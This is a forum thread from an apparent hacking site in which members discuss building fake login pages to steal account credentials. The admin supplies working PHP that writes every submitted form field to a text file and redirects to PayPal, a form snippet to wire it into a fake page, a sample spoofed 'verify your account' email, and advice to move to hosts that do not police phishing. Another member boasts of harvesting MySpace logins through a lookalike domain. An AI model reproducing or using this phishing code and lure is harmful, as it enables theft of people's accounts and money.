Fake login pages. steal info

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.

Fake login pages. steal info

Postby Sethioz » Mon May 26, 2008 2:01 am

V kind a brought this up so i tought ill post .. well more like a question.
its about making the fake login pages for some site (like hotmail) and then give link to a 'victim'. once victim uses it to login then this page will send you his/her user+pass.
if somebody is intrested on how to make such fake login pages then post a reply here. right now the topic is private with quite detailed info (which im not planning to reveale), but i will post a general guide if there's ppl who is intrested in it.
note that..if you set it up RIGHT, then there is very high chance that victim will fall for it. 90% of world has no idea tht this stuff is even possible.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby V » Mon May 26, 2008 10:27 am

so... how does one have to make a fake page so it would be almost 90% successful? and should it fail at first, i doubt the "victim" hehe falls to it 2nd time. but then again that's very individual, depends on how stupid the person is. since 90% world is bunch of fools, including myself, that's why 10% rule rest of the 90% of the world.
Last edited by V on Sun Jan 24, 2010 11:57 am, edited 1 time in total.
User avatar
V
Important
Important
 
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: Fake login pages. steal info

Postby Sethioz » Mon May 26, 2008 3:24 pm

most likely once they will actually see this...they will use it to login. as i said .. need to make it look real and good.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby Thor~God » Fri Jun 13, 2008 2:30 am

plah i once falled for that fake login -_- it sux ass XD but i always figured how it worked :D must be work of art or something... seth teach me when i get to est? :D
User avatar
Thor~God
User
User
 
Posts: 61
Joined: Fri Sep 07, 2007 3:04 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jun 13, 2008 2:46 pm

work of art is when it actually logs you into real site too. so basically theres no way to tell if its fake or not .. only by the URL. ..but if u dont check it (99% of ppl never look at URL when they surf) then theres no way to tell.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby baalpeteor » Sat Aug 09, 2008 8:53 pm

sure i'm interested in seeing it. I used todo the old wmv + swf exploit for myspace... and have a fake login paged hosted on my nix box. The dynamic domain was like mysapce.servebbs.com (thanks to dyndns).

Got about 20 or so before i turned it off. Used to put the big fake clear block link over a whole myspace page or over view more pics (of gurls esp. dudes would have to login to see those pics. You can easily exploit guys using the power of their own penis heheh)

To login to the real site I would think you'd have to run a proxy on the pc that has the fake login page and shuffle their credentials to the real page.. and then whatever data is loaded it loads it to the client in a mitm attack.
baalpeteor
Newbie..
Newbie..
 
Posts: 5
Joined: Sat Aug 09, 2008 8:42 pm

Re: Fake login pages. steal info

Postby Sethioz » Sat Aug 09, 2008 10:27 pm

You can easily exploit guys using the power of their own penis heheh)

haha very well said.
i never actually tought about swf or wmv. how you inject anything in there ? or wht i am missing here?
and about links. if you send a spoofed mail from like [email protected] to somebody saying something like:


Code: Select all
Hello, we are converting data from one server to another and we need you to verify your account by simply logging in ... blablablablabla.... DO NOT send your login info to anyone...etc


it has to be really well written and polite. and link would be something like loginlive.somefreehosting.com/fdsa#"#"323dda/dsa32390¤¤%%%"2-dfsa32/account_login/23909dsa8¤%&%&
nobody even looks this ''somefreehosting'' there. it loox real, so at least 50% of ppl would actually use that link to login. you can also add something into mail like ... the new server will be faster..blabla. to get more ppl to click and use it. i cant remember where i uploaded it (prolly they deleted it by now), but i got mine working quite ok. when you used my fake page to login. it gave no errors, but it didnt log you in. it simply did click and emptyd the fields and then it was real site already. so second login was on real page, but then it already sent the info to me :)
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Wed Jan 06, 2010 8:39 pm

hey seth dude where would the login details be stored

what i want to know lets say this was my site right where would i(you) find my password
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Thu Jan 07, 2010 7:41 pm

it depends what kind of method you are using. you can store them anywhere. you can make the form send it to your email, store locally (where the site is hosted), upload to another FTP ...etc.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Thu Jan 07, 2010 11:29 pm

To be truth fully honest its on the dot the same as this 1 PHB or sum thing but it gets confusing with the database and all i wanna know is where they are im using a free host and if u could say how i get it so it could be sent via email

the login and registration is the same as this 1

and also huge favor because my site is like this well not hackong site But the same format How did u manage to change the top left with a pic of your own and change the writing
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jan 08, 2010 12:34 am

you don't need database.
here is an example. this code will save the info into a simple txt file, which will be located in same folder with the file.

Code: Select all
<?php
header ('Location: https://www.paypal.com/');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


and the following code will go into a fake page to make it use the code above.

Code: Select all
<div class="body"><form method="post" name="login_form" action="update.php">


ofcourse you can't just copy and paste, form name need to be called "login_form" and method need to be "post" ..etc


another option is to use formmail (google for it).
form mail is something that will email the details, but you still have to integrate it into a fake page.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Fri Jan 08, 2010 11:37 am

and where do i run the code
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jan 08, 2010 12:30 pm

mah, its php, can't you see the <php ?> brackets ?
do you even understand what you are trying to do ? it is php code, which goes INSIDE of the fake page you make and then you upload your fake page and send somebody to that page.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Fri Jan 08, 2010 3:45 pm

ok are those 2 sep files or do they go together
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jan 08, 2010 3:55 pm

uhm you can't make a fake page without any knownledge of php.
this one is for paypal. look at the fields. update.php is the file that will do the loggin and redirecting job for you. cant you see paypal.com in the code ?
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Fri Jan 08, 2010 5:56 pm

ok i made fake page and bam site closed due to illegal activity is there a way around this
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jan 08, 2010 7:39 pm

haha ofcourse they close it. try netsons.org. there are some "poor" hostings that will not check what you do.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Fri Jan 08, 2010 9:26 pm

haha thanks for telling me y not say.... hey man dont write this code unless u got unsecure site..... haha
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Re: Fake login pages. steal info

Postby Sethioz » Fri Jan 08, 2010 9:57 pm

well i was testing it here on this site, but i never put it out in public, it was in password protected area, i dont need any problems on Looney friend :) otherwise i could host it.
User avatar
Sethioz
Admin
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown

Re: Fake login pages. steal info

Postby 54321 » Sat Jan 09, 2010 11:19 am

so where is the data stored even without program the password has to be stored somewhere
54321
Forum user
Forum user
 
Posts: 74
Joined: Wed Jun 03, 2009 12:30 pm

Next

Return to PC / Website / Console / Others > Hacking / Cracking / Exploits / Research

Who is online

Users browsing this forum: No registered users and 2 guests

cron